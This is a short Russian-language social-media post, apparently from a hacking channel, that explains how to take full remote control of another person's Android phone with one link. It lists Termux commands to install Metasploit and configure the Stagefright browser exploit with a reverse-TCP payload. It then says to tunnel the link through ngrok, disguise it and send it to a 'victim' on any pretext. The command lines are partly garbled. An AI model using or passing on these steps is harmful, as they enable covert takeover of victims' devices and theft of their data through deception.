2021-11-25 21:37:11
Получаем доступ к телефонуВ данном посте мы поговорим о том, как при помощи всего-лишь одной ссылки получить полный контроль над чужим устройством.
Поможет нам в этом специальная утилита Metasploit, которая прекрасно справляется с уязвимостями Android старых версий.
Первым делом устанавливаем нашу утилиту в Termux:
update
apt upgrade
pkg install unstable-repo
pkg install metasploit
После этого запускаем утилиту
• Теперь, если Stagefright нет в Metasploit, то скачиваем его отсюда /→ ТЫК ← и перекидываем в папку с эксплоитами.
После этого прописываем:
msfconsole — открытие консоли
use exploit/android/browser/stagefright
mp4tx3g
64bit — подключение эксплоита set SRVHOST ваш IP URIPATH /set PAYLOAD linux/armle/mettle/reversetcp
set LHOST вашIP
set VERBOSE true
exploit j — запуск эксплоита
Для нас сгенерируется специальная ссылка. Заворачиваем её в ngrok, по желанию маскируем и отправляем жертве под любым предлогом. Когда жертва по ней перейдёт, мы получим удалённый доступ к телефону.
2.7K viewsedited 18:37